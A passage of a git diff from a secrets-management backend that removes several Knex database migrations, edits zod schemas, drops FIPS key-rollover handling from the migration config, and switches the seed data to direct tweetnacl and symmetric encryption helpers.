-          if (project.needsSsh) {
-            kickoutPromises.push(kickOutSshProject(knex, project.id));
-          }
-          if (project.needsSecretScanning) {
-            kickoutPromises.push(kickOutSecretScanningProject(knex, project.id));
-          }
-
-          // Execute all kickouts in parallel and handle any failures gracefully
-          if (kickoutPromises.length > 0) {
-            const results = await Promise.allSettled(kickoutPromises);
-
-            // Log any failures for debugging
-            results.forEach((res) => {
-              if (res.status === "rejected") {
-                throw new Error(`Migration failed for project ${project.id}: ${res.reason}`);
-              }
-            });
-          }
-
-          processedIds.push(project.id);
-        }
-
-        // Clear defaultProduct for the processed batch
-        if (processedIds.length > 0) {
-          await knex(TableName.Project).whereIn("id", processedIds).update("defaultProduct", null);
-        }
-      }
-    }
-  } finally {
-    await knex.raw(`SET statement_timeout = '${originalTimeout}'`);
-  }
-}
-
-export async function down(knex: Knex): Promise<void> {
-  const hasTypeColumn = await knex.schema.hasColumn(TableName.Project, "type");
-  const hasDefaultTypeColumn = await knex.schema.hasColumn(TableName.Project, "defaultProduct");
-  if (hasTypeColumn && hasDefaultTypeColumn) {
-    await knex(TableName.Project).update({
-      // eslint-disable-next-line
-      // @ts-ignore this is because this field is created later
-      defaultProduct: knex.raw(`
-    CASE 
-      WHEN "type" IS NULL OR "type" = '' THEN 'secret-manager' 
-      ELSE "type" 
-    END
-  `)
-    });
-
-    await knex.schema.alterTable(TableName.Project, (t) => {
-      t.string("type").nullable().alter();
-      t.string("defaultProduct").notNullable().alter();
-    });
-  }
-
-  const hasTemplateTypeColumn = await knex.schema.hasColumn(TableName.ProjectTemplates, "type");
-  if (hasTemplateTypeColumn) {
-    await knex.schema.alterTable(TableName.ProjectTemplates, (t) => {
-      t.string("type").nullable().alter();
-    });
-  }
-}

backend/src/db/migrations/20250721101756_bump-aws-arn-field-size.ts

@@ -1,21 +0,0 @@
-import { Knex } from "knex";
-
-import { TableName } from "../schemas";
-
-export async function up(knex: Knex): Promise<void> {
-  const hasColumn = await knex.schema.hasColumn(TableName.IdentityAwsAuth, "allowedPrincipalArns");
-  if (hasColumn) {
-    await knex.schema.alterTable(TableName.IdentityAwsAuth, (t) => {
-      t.string("allowedPrincipalArns", 4096).notNullable().alter();
-    });
-  }
-}
-
-export async function down(knex: Knex): Promise<void> {
-  const hasColumn = await knex.schema.hasColumn(TableName.IdentityAwsAuth, "allowedPrincipalArns");
-  if (hasColumn) {
-    await knex.schema.alterTable(TableName.IdentityAwsAuth, (t) => {
-      t.string("allowedPrincipalArns", 2048).notNullable().alter();
-    });
-  }
-}

backend/src/db/migrations/20250722152841_add-policies-environments-table.ts

@@ -1,96 +0,0 @@
-import { Knex } from "knex";
-
-import { selectAllTableCols } from "@app/lib/knex";
-
-import { TableName } from "../schemas";
-import { createOnUpdateTrigger, dropOnUpdateTrigger } from "../utils";
-
-export async function up(knex: Knex): Promise<void> {
-  if (!(await knex.schema.hasTable(TableName.AccessApprovalPolicyEnvironment))) {
-    await knex.schema.createTable(TableName.AccessApprovalPolicyEnvironment, (t) => {
-      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
-      t.uuid("policyId").notNullable();
-      t.foreign("policyId").references("id").inTable(TableName.AccessApprovalPolicy).onDelete("CASCADE");
-      t.uuid("envId").notNullable();
-      t.foreign("envId").references("id").inTable(TableName.Environment);
-      t.timestamps(true, true, true);
-      t.unique(["policyId", "envId"]);
-    });
-
-    await createOnUpdateTrigger(knex, TableName.AccessApprovalPolicyEnvironment);
-
-    const existingAccessApprovalPolicies = await knex(TableName.AccessApprovalPolicy)
-      .select(selectAllTableCols(TableName.AccessApprovalPolicy))
-      .whereNotNull(`${TableName.AccessApprovalPolicy}.envId`);
-
-    const accessApprovalPolicies = existingAccessApprovalPolicies.map(async (policy) => {
-      await knex(TableName.AccessApprovalPolicyEnvironment).insert({
-        policyId: policy.id,
-        envId: policy.envId
-      });
-    });
-
-    await Promise.all(accessApprovalPolicies);
-  }
-  if (!(await knex.schema.hasTable(TableName.SecretApprovalPolicyEnvironment))) {
-    await knex.schema.createTable(TableName.SecretApprovalPolicyEnvironment, (t) => {
-      t.uuid("id", { primaryKey: true }).defaultTo(knex.fn.uuid());
-      t.uuid("policyId").notNullable();
-      t.foreign("policyId").references("id").inTable(TableName.SecretApprovalPolicy).onDelete("CASCADE");
-      t.uuid("envId").notNullable();
-      t.foreign("envId").references("id").inTable(TableName.Environment);
-      t.timestamps(true, true, true);
-      t.unique(["policyId", "envId"]);
-    });
-
-    await createOnUpdateTrigger(knex, TableName.SecretApprovalPolicyEnvironment);
-
-    const existingSecretApprovalPolicies = await knex(TableName.SecretApprovalPolicy)
-      .select(selectAllTableCols(TableName.SecretApprovalPolicy))
-      .whereNotNull(`${TableName.SecretApprovalPolicy}.envId`);
-
-    const secretApprovalPolicies = existingSecretApprovalPolicies.map(async (policy) => {
-      await knex(TableName.SecretApprovalPolicyEnvironment).insert({
-        policyId: policy.id,
-        envId: policy.envId
-      });
-    });
-
-    await Promise.all(secretApprovalPolicies);
-  }
-
-  await knex.schema.alterTable(TableName.AccessApprovalPolicy, (t) => {
-    t.dropForeign(["envId"]);
-
-    // Add the new foreign key constraint with ON DELETE SET NULL
-    t.foreign("envId").references("id").inTable(TableName.Environment).onDelete("SET NULL");
-  });
-
-  await knex.schema.alterTable(TableName.SecretApprovalPolicy, (t) => {
-    t.dropForeign(["envId"]);
-
-    // Add the new foreign key constraint with ON DELETE SET NULL
-    t.foreign("envId").references("id").inTable(TableName.Environment).onDelete("SET NULL");
-  });
-}
-
-export async function down(knex: Knex): Promise<void> {
-  if (await knex.schema.hasTable(TableName.AccessApprovalPolicyEnvironment)) {
-    await knex.schema.dropTableIfExists(TableName.AccessApprovalPolicyEnvironment);
-    await dropOnUpdateTrigger(knex, TableName.AccessApprovalPolicyEnvironment);
-  }
-  if (await knex.schema.hasTable(TableName.SecretApprovalPolicyEnvironment)) {
-    await knex.schema.dropTableIfExists(TableName.SecretApprovalPolicyEnvironment);
-    await dropOnUpdateTrigger(knex, TableName.SecretApprovalPolicyEnvironment);
-  }
-
-  await knex.schema.alterTable(TableName.AccessApprovalPolicy, (t) => {
-    t.dropForeign(["envId"]);
-    t.foreign("envId").references("id").inTable(TableName.Environment).onDelete("CASCADE");
-  });
-
-  await knex.schema.alterTable(TableName.SecretApprovalPolicy, (t) => {
-    t.dropForeign(["envId"]);
-    t.foreign("envId").references("id").inTable(TableName.Environment).onDelete("CASCADE");
-  });
-}

backend/src/db/migrations/20250725144940_fix-secret-reminders-migration.ts

@@ -1,111 +0,0 @@
-/* eslint-disable no-await-in-loop */
-import { Knex } from "knex";
-
-import { chunkArray } from "@app/lib/fn";
-import { logger } from "@app/lib/logger";
-
-import { TableName } from "../schemas";
-import { TReminders, TRemindersInsert } from "../schemas/reminders";
-
-export async function up(knex: Knex): Promise<void> {
-  logger.info("Initializing secret reminders migration");
-  const hasReminderTable = await knex.schema.hasTable(TableName.Reminder);
-
-  if (hasReminderTable) {
-    const secretsWithLatestVersions = await knex(TableName.SecretV2)
-      .whereNotNull(`${TableName.SecretV2}.reminderRepeatDays`)
-      .whereRaw(`"${TableName.SecretV2}"."reminderRepeatDays" > 0`)
-      .innerJoin(TableName.SecretVersionV2, (qb) => {
-        void qb
-          .on(`${TableName.SecretVersionV2}.secretId`, "=", `${TableName.SecretV2}.id`)
-          .andOn(`${TableName.SecretVersionV2}.reminderRepeatDays`, "=", `${TableName.SecretV2}.reminderRepeatDays`);
-      })
-      .whereIn([`${TableName.SecretVersionV2}.secretId`, `${TableName.SecretVersionV2}.version`], (qb) => {
-        void qb
-          .select(["v2.secretId", knex.raw("MIN(v2.version) as version")])
-          .from(`${TableName.SecretVersionV2} as v2`)
-          .innerJoin(`${TableName.SecretV2} as s2`, "v2.secretId", "s2.id")
-          .whereRaw(`v2."reminderRepeatDays" = s2."reminderRepeatDays"`)
-          .whereNotNull("v2.reminderRepeatDays")
-          .whereRaw(`v2."reminderRepeatDays" > 0`)
-          .groupBy("v2.secretId");
-      })
-      // Add LEFT JOIN with Reminder table to check for existing reminders
-      .leftJoin(TableName.Reminder, `${TableName.Reminder}.secretId`, `${TableName.SecretV2}.id`)
-      // Only include secrets that don't already have reminders
-      .whereNull(`${TableName.Reminder}.secretId`)
-      .select(
-        knex.ref("id").withSchema(TableName.SecretV2).as("secretId"),
-        knex.ref("reminderRepeatDays").withSchema(TableName.SecretV2).as("reminderRepeatDays"),
-        knex.ref("reminderNote").withSchema(TableName.SecretV2).as("reminderNote"),
-        knex.ref("createdAt").withSchema(TableName.SecretVersionV2).as("createdAt")
-      );
-
-    logger.info(`Found ${secretsWithLatestVersions.length} reminders to migrate`);
-
-    const reminderInserts: TRemindersInsert[] = [];
-    if (secretsWithLatestVersions.length > 0) {
-      secretsWithLatestVersions.forEach((secret) => {
-        if (!secret.reminderRepeatDays) return;
-
-        const now = new Date();
-        const createdAt = new Date(secret.createdAt);
-        let nextReminderDate = new Date(createdAt);
-        nextReminderDate.setDate(nextReminderDate.getDate() + secret.reminderRepeatDays);
-
-        // If the next reminder date is in the past, calculate the proper next occurrence
-        if (nextReminderDate < now) {
-          const daysSinceCreation = Math.floor((now.getTime() - createdAt.getTime()) / (1000 * 60 * 60 * 24));
-          const daysIntoCurrentCycle = daysSinceCreation % secret.reminderRepeatDays;
-          const daysUntilNextReminder = secret.reminderRepeatDays - daysIntoCurrentCycle;
-
-          nextReminderDate = new Date(now);
-          nextReminderDate.setDate(now.getDate() + daysUntilNextReminder);
-        }
-
-        reminderInserts.push({
-          secretId: secret.secretId,
-          message: secret.reminderNote,
-          repeatDays: secret.reminderRepeatDays,
-          nextReminderDate
-        });
-      });
-
-      const commitBatches = chunkArray(reminderInserts, 2000);
-      for (const commitBatch of commitBatches) {
-        const insertedReminders = (await knex
-          .batchInsert(TableName.Reminder, commitBatch)
-          .returning("*")) as TReminders[];
-
-        const insertedReminderSecretIds = insertedReminders.map((reminder) => reminder.secretId).filter(Boolean);
-
-        const recipients = await knex(TableName.SecretReminderRecipients)
-          .whereRaw(`??.?? IN (${insertedReminderSecretIds.map(() => "?").join(",")})`, [
-            TableName.SecretReminderRecipients,
-            "secretId",
-            ...insertedReminderSecretIds
-          ])
-          .select(
-            knex.ref("userId").withSchema(TableName.SecretReminderRecipients).as("userId"),
-            knex.ref("secretId").withSchema(TableName.SecretReminderRecipients).as("secretId")
-          );
-        const reminderRecipients = recipients.map((recipient) => ({
-          reminderId: insertedReminders.find((reminder) => reminder.secretId === recipient.secretId)?.id,
-          userId: recipient.userId
-        }));
-
-        const filteredRecipients = reminderRecipients.filter((recipient) => Boolean(recipient.reminderId));
-        await knex.batchInsert(TableName.ReminderRecipient, filteredRecipients);
-      }
-      logger.info(`Successfully migrated ${reminderInserts.length} secret reminders`);
-    }
-
-    logger.info("Secret reminders migration completed");
-  } else {
-    logger.warn("Reminder table does not exist, skipping migration");
-  }
-}
-
-export async function down(): Promise<void> {
-  logger.info("Rollback not implemented for secret reminders fix migration");
-}

backend/src/db/migrations/20250725171821_add-secret-detection-ignore-values.ts

@@ -1,19 +0,0 @@
-import { Knex } from "knex";
-
-import { TableName } from "../schemas";
-
-export async function up(knex: Knex): Promise<void> {
-  if (!(await knex.schema.hasColumn(TableName.Project, "secretDetectionIgnoreValues"))) {
-    await knex.schema.alterTable(TableName.Project, (t) => {
-      t.specificType("secretDetectionIgnoreValues", "text[]");
-    });
-  }
-}
-
-export async function down(knex: Knex): Promise<void> {
-  if (await knex.schema.hasColumn(TableName.Project, "secretDetectionIgnoreValues")) {
-    await knex.schema.alterTable(TableName.Project, (t) => {
-      t.dropColumn("secretDetectionIgnoreValues");
-    });
-  }
-}

backend/src/db/migrations/utils/env-config.ts

@@ -1,8 +1,6 @@
 import { z } from "zod";
 
-import { crypto } from "@app/lib/crypto/cryptography";
 import { zpStr } from "@app/lib/zod";
-import { TSuperAdminDALFactory } from "@app/services/super-admin/super-admin-dal";
 
 const envSchema = z
   .object({
@@ -37,7 +35,7 @@ const envSchema = z
 
 export type TMigrationEnvConfig = z.infer<typeof envSchema>;
 
-export const getMigrationEnvConfig = async (superAdminDAL: TSuperAdminDALFactory) => {
+export const getMigrationEnvConfig = () => {
   const parsedEnv = envSchema.safeParse(process.env);
   if (!parsedEnv.success) {
     // eslint-disable-next-line no-console
@@ -51,24 +49,5 @@ export const getMigrationEnvConfig = async (superAdminDAL: TSuperAdminDALFactory
     process.exit(-1);
   }
 
-  let envCfg = Object.freeze(parsedEnv.data);
-
-  const fipsEnabled = await crypto.initialize(superAdminDAL, envCfg);
-
-  // Fix for 128-bit entropy encryption key expansion issue:
-  // In FIPS it is not ideal to expand a 128-bit key into 256-bit. We solved this issue in the past by creating the ROOT_ENCRYPTION_KEY.
-  // If FIPS mode is enabled, we set the value of ROOT_ENCRYPTION_KEY to the value of ENCRYPTION_KEY.
-  // ROOT_ENCRYPTION_KEY is expected to be a 256-bit base64-encoded key, unlike the 32-byte key of ENCRYPTION_KEY.
-  // When ROOT_ENCRYPTION_KEY is set, our cryptography will always use a 256-bit entropy encryption key. So for the sake of FIPS we should just roll over the value of ENCRYPTION_KEY to ROOT_ENCRYPTION_KEY.
-  if (fipsEnabled) {
-    const newEnvCfg = {
-      ...envCfg,
-      ROOT_ENCRYPTION_KEY: envCfg.ENCRYPTION_KEY
-    };
-    delete newEnvCfg.ENCRYPTION_KEY;
-
-    envCfg = Object.freeze(newEnvCfg);
-  }
-
-  return envCfg;
+  return Object.freeze(parsedEnv.data);
 };

backend/src/db/schemas/access-approval-policies-approvers.ts

@@ -14,8 +14,8 @@ export const AccessApprovalPoliciesApproversSchema = z.object({
   updatedAt: z.date(),
   approverUserId: z.string().uuid().nullable().optional(),
   approverGroupId: z.string().uuid().nullable().optional(),
-  sequence: z.number().default(1).nullable().optional(),
-  approvalsRequired: z.number().nullable().optional()
+  sequence: z.number().default(0).nullable().optional(),
+  approvalsRequired: z.number().default(1).nullable().optional()
 });
 
 export type TAccessApprovalPoliciesApprovers = z.infer<typeof AccessApprovalPoliciesApproversSchema>;

backend/src/db/schemas/access-approval-policies-environments.ts

@@ -1,25 +0,0 @@
-// Code generated by automation script, DO NOT EDIT.
-// Automated by pulling database and generating zod schema
-// To update. Just run npm run generate:schema
-// Written by akhilmhdh.
-
-import { z } from "zod";
-
-import { TImmutableDBKeys } from "./models";
-
-export const AccessApprovalPoliciesEnvironmentsSchema = z.object({
-  id: z.string().uuid(),
-  policyId: z.string().uuid(),
-  envId: z.string().uuid(),
-  createdAt: z.date(),
-  updatedAt: z.date()
-});
-
-export type TAccessApprovalPoliciesEnvironments = z.infer<typeof AccessApprovalPoliciesEnvironmentsSchema>;
-export type TAccessApprovalPoliciesEnvironmentsInsert = Omit<
-  z.input<typeof AccessApprovalPoliciesEnvironmentsSchema>,
-  TImmutableDBKeys
->;
-export type TAccessApprovalPoliciesEnvironmentsUpdate = Partial<
-  Omit<z.input<typeof AccessApprovalPoliciesEnvironmentsSchema>, TImmutableDBKeys>
->;

backend/src/db/schemas/access-approval-policies.ts

@@ -11,7 +11,7 @@ export const AccessApprovalPoliciesSchema = z.object({
   id: z.string().uuid(),
   name: z.string(),
   approvals: z.number().default(1),
-  secretPath: z.string(),
+  secretPath: z.string().nullable().optional(),
   envId: z.string().uuid(),
   createdAt: z.date(),
   updatedAt: z.date(),

backend/src/db/schemas/app-connections.ts

@@ -20,8 +20,7 @@ export const AppConnectionsSchema = z.object({
   orgId: z.string().uuid(),
   createdAt: z.date(),
   updatedAt: z.date(),
-  isPlatformManagedCredentials: z.boolean().default(false).nullable().optional(),
-  gatewayId: z.string().uuid().nullable().optional()
+  isPlatformManagedCredentials: z.boolean().default(false).nullable().optional()
 });
 
 export type TAppConnections = z.infer<typeof AppConnectionsSchema>;

backend/src/db/schemas/certificate-authorities.ts

@@ -12,8 +12,8 @@ export const CertificateAuthoritiesSchema = z.object({
   createdAt: z.date(),
   updatedAt: z.date(),
   projectId: z.string(),
-  status: z.string(),
   enableDirectIssuance: z.boolean().default(true),
+  status: z.string(),
   name: z.string()
 });
 

backend/src/db/schemas/certificates.ts

@@ -25,8 +25,8 @@ export const CertificatesSchema = z.object({
   certificateTemplateId: z.string().uuid().nullable().optional(),
   keyUsages: z.string().array().nullable().optional(),
   extendedKeyUsages: z.string().array().nullable().optional(),
-  projectId: z.string(),
-  pkiSubscriberId: z.string().uuid().nullable().optional()
+  pkiSubscriberId: z.string().uuid().nullable().optional(),
+  projectId: z.string()
 });
 
 export type TCertificates = z.infer<typeof CertificatesSchema>;

backend/src/db/schemas/models.ts

@@ -100,7 +100,6 @@ export enum TableName {
   AccessApprovalPolicyBypasser = "access_approval_policies_bypassers",
   AccessApprovalRequest = "access_approval_requests",
   AccessApprovalRequestReviewer = "access_approval_requests_reviewers",
-  AccessApprovalPolicyEnvironment = "access_approval_policies_environments",
   SecretApprovalPolicy = "secret_approval_policies",
   SecretApprovalPolicyApprover = "secret_approval_policies_approvers",
   SecretApprovalPolicyBypasser = "secret_approval_policies_bypassers",
@@ -108,7 +107,6 @@ export enum TableName {
   SecretApprovalRequestReviewer = "secret_approval_requests_reviewers",
   SecretApprovalRequestSecret = "secret_approval_requests_secrets",
   SecretApprovalRequestSecretTag = "secret_approval_request_secret_tags",
-  SecretApprovalPolicyEnvironment = "secret_approval_policies_environments",
   SecretRotation = "secret_rotations",
   SecretRotationOutput = "secret_rotation_outputs",
   SamlConfig = "saml_configs",
@@ -162,7 +160,7 @@ export enum TableName {
   SecretRotationV2SecretMapping = "secret_rotation_v2_secret_mappings",
   MicrosoftTeamsIntegrations = "microsoft_teams_integrations",
   ProjectMicrosoftTeamsConfigs = "project_microsoft_teams_configs",
-  SecretReminderRecipients = "secret_reminder_recipients", // TODO(Carlos): Remove this in the future after migrating to the new reminder recipients table
+  SecretReminderRecipients = "secret_reminder_recipients",
   GithubOrgSyncConfig = "github_org_sync_configs",
   FolderCommit = "folder_commits",
   FolderCommitChanges = "folder_commit_changes",
@@ -174,10 +172,7 @@ export enum TableName {
   SecretScanningResource = "secret_scanning_resources",
   SecretScanningScan = "secret_scanning_scans",
   SecretScanningFinding = "secret_scanning_findings",
-  SecretScanningConfig = "secret_scanning_configs",
-  // reminders
-  Reminder = "reminders",
-  ReminderRecipient = "reminders_recipients"
+  SecretScanningConfig = "secret_scanning_configs"
 }
 
 export type TImmutableDBKeys = "id" | "createdAt" | "updatedAt" | "commitId";
@@ -272,16 +267,6 @@ export enum ProjectType {
   SecretScanning = "secret-scanning"
 }
 
-export enum ActionProjectType {
-  SecretManager = ProjectType.SecretManager,
-  CertificateManager = ProjectType.CertificateManager,
-  KMS = ProjectType.KMS,
-  SSH = ProjectType.SSH,
-  SecretScanning = ProjectType.SecretScanning,
-  // project operations that happen on all types
-  Any = "any"
-}
-
 export enum SortDirection {
   ASC = "asc",
   DESC = "desc"

backend/src/db/schemas/project-templates.ts

@@ -16,7 +16,7 @@ export const ProjectTemplatesSchema = z.object({
   orgId: z.string().uuid(),
   createdAt: z.date(),
   updatedAt: z.date(),
-  type: z.string().default("secret-manager")
+  type: z.string().nullable().optional()
 });
 
 export type TProjectTemplates = z.infer<typeof ProjectTemplatesSchema>;

backend/src/db/schemas/projects.ts

@@ -25,13 +25,12 @@ export const ProjectsSchema = z.object({
   kmsSecretManagerKeyId: z.string().uuid().nullable().optional(),
   kmsSecretManagerEncryptedDataKey: zodBuffer.nullable().optional(),
   description: z.string().nullable().optional(),
-  type: z.string(),
+  type: z.string().nullable().optional(),
   enforceCapitalization: z.boolean().default(false),
   hasDeleteProtection: z.boolean().default(false).nullable().optional(),
   secretSharing: z.boolean().default(true),
   showSnapshotsLegacy: z.boolean().default(false),
-  defaultProduct: z.string().nullable().optional(),
-  secretDetectionIgnoreValues: z.string().array().nullable().optional()
+  defaultProduct: z.string().default("secret-manager")
 });
 
 export type TProjects = z.infer<typeof ProjectsSchema>;

backend/src/db/schemas/reminders-recipients.ts

@@ -1,20 +0,0 @@
-// Code generated by automation script, DO NOT EDIT.
-// Automated by pulling database and generating zod schema
-// To update. Just run npm run generate:schema
-// Written by akhilmhdh.
-
-import { z } from "zod";
-
-import { TImmutableDBKeys } from "./models";
-
-export const RemindersRecipientsSchema = z.object({
-  id: z.string().uuid(),
-  reminderId: z.string().uuid(),
-  userId: z.string().uuid(),
-  createdAt: z.date(),
-  updatedAt: z.date()
-});
-
-export type TRemindersRecipients = z.infer<typeof RemindersRecipientsSchema>;
-export type TRemindersRecipientsInsert = Omit<z.input<typeof RemindersRecipientsSchema>, TImmutableDBKeys>;
-export type TRemindersRecipientsUpdate = Partial<Omit<z.input<typeof RemindersRecipientsSchema>, TImmutableDBKeys>>;

backend/src/db/schemas/reminders.ts

@@ -1,22 +0,0 @@
-// Code generated by automation script, DO NOT EDIT.
-// Automated by pulling database and generating zod schema
-// To update. Just run npm run generate:schema
-// Written by akhilmhdh.
-
-import { z } from "zod";
-
-import { TImmutableDBKeys } from "./models";
-
-export const RemindersSchema = z.object({
-  id: z.string().uuid(),
-  secretId: z.string().uuid().nullable().optional(),
-  message: z.string().nullable().optional(),
-  repeatDays: z.number().nullable().optional(),
-  nextReminderDate: z.date(),
-  createdAt: z.date(),
-  updatedAt: z.date()
-});
-
-export type TReminders = z.infer<typeof RemindersSchema>;
-export type TRemindersInsert = Omit<z.input<typeof RemindersSchema>, TImmutableDBKeys>;
-export type TRemindersUpdate = Partial<Omit<z.input<typeof RemindersSchema>, TImmutableDBKeys>>;

backend/src/db/schemas/secret-approval-policies-environments.ts

@@ -1,25 +0,0 @@
-// Code generated by automation script, DO NOT EDIT.
-// Automated by pulling database and generating zod schema
-// To update. Just run npm run generate:schema
-// Written by akhilmhdh.
-
-import { z } from "zod";
-
-import { TImmutableDBKeys } from "./models";
-
-export const SecretApprovalPoliciesEnvironmentsSchema = z.object({
-  id: z.string().uuid(),
-  policyId: z.string().uuid(),
-  envId: z.string().uuid(),
-  createdAt: z.date(),
-  updatedAt: z.date()
-});
-
-export type TSecretApprovalPoliciesEnvironments = z.infer<typeof SecretApprovalPoliciesEnvironmentsSchema>;
-export type TSecretApprovalPoliciesEnvironmentsInsert = Omit<
-  z.input<typeof SecretApprovalPoliciesEnvironmentsSchema>,
-  TImmutableDBKeys
->;
-export type TSecretApprovalPoliciesEnvironmentsUpdate = Partial<
-  Omit<z.input<typeof SecretApprovalPoliciesEnvironmentsSchema>, TImmutableDBKeys>
->;

backend/src/db/schemas/secret-approval-policies.ts

@@ -10,7 +10,7 @@ import { TImmutableDBKeys } from "./models";
 export const SecretApprovalPoliciesSchema = z.object({
   id: z.string().uuid(),
   name: z.string(),
-  secretPath: z.string(),
+  secretPath: z.string().nullable().optional(),
   approvals: z.number().default(1),
   envId: z.string().uuid(),
   createdAt: z.date(),

backend/src/db/schemas/secret-approval-requests.ts

@@ -18,7 +18,7 @@ export const SecretApprovalRequestsSchema = z.object({
   createdAt: z.date(),
   updatedAt: z.date(),
   isReplicated: z.boolean().nullable().optional(),
-  committerUserId: z.string().uuid().nullable().optional(),
+  committerUserId: z.string().uuid(),
   statusChangedByUserId: z.string().uuid().nullable().optional(),
   bypassReason: z.string().nullable().optional()
 });

backend/src/db/schemas/super-admin.ts

@@ -35,8 +35,7 @@ export const SuperAdminSchema = z.object({
   encryptedGitHubAppConnectionSlug: zodBuffer.nullable().optional(),
   encryptedGitHubAppConnectionId: zodBuffer.nullable().optional(),
   encryptedGitHubAppConnectionPrivateKey: zodBuffer.nullable().optional(),
-  encryptedEnvOverrides: zodBuffer.nullable().optional(),
-  fipsEnabled: z.boolean().default(false)
+  encryptedEnvOverrides: zodBuffer.nullable().optional()
 });
 
 export type TSuperAdmin = z.infer<typeof SuperAdminSchema>;

backend/src/db/seed-data.ts

@@ -1,8 +1,18 @@
 /* eslint-disable import/no-mutable-exports */
+import crypto from "node:crypto";
+
 import argon2, { argon2id } from "argon2";
 import jsrp from "jsrp";
+import nacl from "tweetnacl";
+import { encodeBase64 } from "tweetnacl-util";
 
-import { crypto, SymmetricKeySize } from "@app/lib/crypto/cryptography";
+import {
+  decryptAsymmetric,
+  // decryptAsymmetric,
+  decryptSymmetric128BitHexKeyUTF8,
+  encryptAsymmetric,
+  encryptSymmetric128BitHexKeyUTF8
+} from "@app/lib/crypto";
 
 import { TSecrets, TUserEncryptionKeys } from "./schemas";
 
@@ -52,7 +62,11 @@ export const seedData1 = {
 };
 
 export const generateUserSrpKeys = async (password: string) => {
-  const { publicKey, privateKey } = await crypto.encryption().asymmetric().generateKeyPair();
+  const pair = nacl.box.keyPair();
+  const secretKeyUint8Array = pair.secretKey;
+  const publicKeyUint8Array = pair.publicKey;
+  const privateKey = encodeBase64(secretKeyUint8Array);
+  const publicKey = encodeBase64(publicKeyUint8Array);
 
   // eslint-disable-next-line
   const client = new jsrp.client();
@@ -84,11 +98,7 @@ export const generateUserSrpKeys = async (password: string) => {
     ciphertext: encryptedPrivateKey,
     iv: encryptedPrivateKeyIV,
     tag: encryptedPrivateKeyTag
-  } = crypto.encryption().symmetric().encrypt({
-    plaintext: privateKey,
-    key,
-    keySize: SymmetricKeySize.Bits128
-  });
+  } = encryptSymmetric128BitHexKeyUTF8(privateKey, key);
 
   // create the protected key by encrypting the symmetric key
   // [key] with the derived key
@@ -96,10 +106,7 @@ export const generateUserSrpKeys = async (password: string) => {
     ciphertext: protectedKey,
     iv: protectedKeyIV,
     tag: protectedKeyTag
-  } = crypto
-    .encryption()
-    .symmetric()
-    .encrypt({ plaintext: key.toString("hex"), key: derivedKey, keySize: SymmetricKeySize.Bits128 });
+  } = encryptSymmetric128BitHexKeyUTF8(key.toString("hex"), derivedKey);
 
   return {
     protectedKey,
@@ -126,38 +133,30 @@ export const getUserPrivateKey = async (password: string, user: TUserEncryptionK
   });
   if (!derivedKey) throw new Error("Failed to derive key from password");
 
-  const key = crypto
-    .encryption()
-    .symmetric()
-    .decrypt({
-      ciphertext: user.protectedKey as string,
-      iv: user.protectedKeyIV as string,
-      tag: user.protectedKeyTag as string,
-      key: derivedKey,
-      keySize: SymmetricKeySize.Bits128
-    });
+  const key = decryptSymmetric128BitHexKeyUTF8({
+    ciphertext: user.protectedKey as string,
+    iv: user.protectedKeyIV as string,
+    tag: user.protectedKeyTag as string,
+    key: derivedKey
+  });
 
-  const privateKey = crypto
-    .encryption()
-    .symmetric()
-    .decrypt({
-      ciphertext: user.encryptedPrivateKey,
-      iv: user.iv,
-      tag: user.tag,
-      key: Buffer.from(key, "hex"),
-      keySize: SymmetricKeySize.Bits128
-    });
+  const privateKey = decryptSymmetric128BitHexKeyUTF8({
+    ciphertext: user.encryptedPrivateKey,
+    iv: user.iv,
+    tag: user.tag,
+    key: Buffer.from(key, "hex")
+  });
   return privateKey;
 };
 
 export const buildUserProjectKey = (privateKey: string, publickey: string) => {
   const randomBytes = crypto.randomBytes(16).toString("hex");
-  const { nonce, ciphertext } = crypto.encryption().asymmetric().encrypt(randomBytes, publickey, privateKey);
+  const { nonce, ciphertext } = encryptAsymmetric(randomBytes, publickey, privateKey);
   return { nonce, ciphertext };
 };
 
 export const getUserProjectKey = async (privateKey: string, ciphertext: string, nonce: string, publicKey: string) => {
-  return crypto.encryption().asymmetric().decrypt({
+  return decryptAsymmetric({
     ciphertext,
     nonce,
     publicKey,
@@ -171,39 +170,21 @@ export const encryptSecret = (encKey: string, key: string, value?: string, comme
     ciphertext: secretKeyCiphertext,
     iv: secretKeyIV,
     tag: secretKeyTag
-  } = crypto.encryption().symmetric().encrypt({
-    plaintext: key,
-    key: encKey,
-    keySize: SymmetricKeySize.Bits128
-  });
+  } = encryptSymmetric128BitHexKeyUTF8(key, encKey);
 
   // encrypt value
   const {
     ciphertext: secretValueCiphertext,
     iv: secretValueIV,
     tag: secretValueTag
-  } = crypto
-    .encryption()
-    .symmetric()
-    .encrypt({
-      plaintext: value ?? "",
-      key: encKey,
-      keySize: SymmetricKeySize.Bits128
-    });
+  } = encryptSymmetric128BitHexKeyUTF8(value ?? "", encKey);
 
   // encrypt comment
   const {
     ciphertext: secretCommentCiphertext,
     iv: secretCommentIV,
     tag: secretCommentTag
-  } = crypto
-    .encryption()
-    .symmetric()
-    .encrypt({
-      plaintext: comment ?? "",
-      key: encKey,
-      keySize: SymmetricKeySize.Bits128
-    });
+  } = encryptSymmetric128BitHexKeyUTF8(comment ?? "", encKey);
 
   return {
     secretKeyCiphertext,
@@ -219,30 +200,27 @@ export const encryptSecret = (encKey: string, key: string, value?: string, comme
 };
 
 export const decryptSecret = (decryptKey: string, encSecret: TSecrets) => {
-  const secretKey = crypto.encryption().symmetric().decrypt({
+  const secretKey = decryptSymmetric128BitHexKeyUTF8({
     key: decryptKey,
     ciphertext: encSecret.secretKeyCiphertext,
     tag: encSecret.secretKeyTag,
-    iv: encSecret.secretKeyIV,
-    keySize: SymmetricKeySize.Bits128
+    iv: encSecret.secretKeyIV
   });
 
-  const secretValue = crypto.encryption().symmetric().decrypt({
+  const secretValue = decryptSymmetric128BitHexKeyUTF8({
     key: decryptKey,
     ciphertext: encSecret.secretValueCiphertext,
     tag: encSecret.secretValueTag,
-    iv: encSecret.secretValueIV,
-    keySize: SymmetricKeySize.Bits128
+    iv: encSecret.secretValueIV
   });
 
   const secretComment =
     encSecret.secretCommentIV && encSecret.secretCommentTag && encSecret.secretCommentCiphertext
-      ? crypto.encryption().symmetric().decrypt({
+      ? decryptSymmetric128BitHexKeyUTF8({
           key: decryptKey,
           ciphertext: encSecret.secretCommentCiphertext,
           tag: encSecret.secretCommentTag,
-          iv: encSecret.secretCommentIV,
-          keySize: SymmetricKeySize.Bits128
+          iv: encSecret.secretCommentIV
         })
       : "";
 

backend/src/db/seeds/1-user.ts

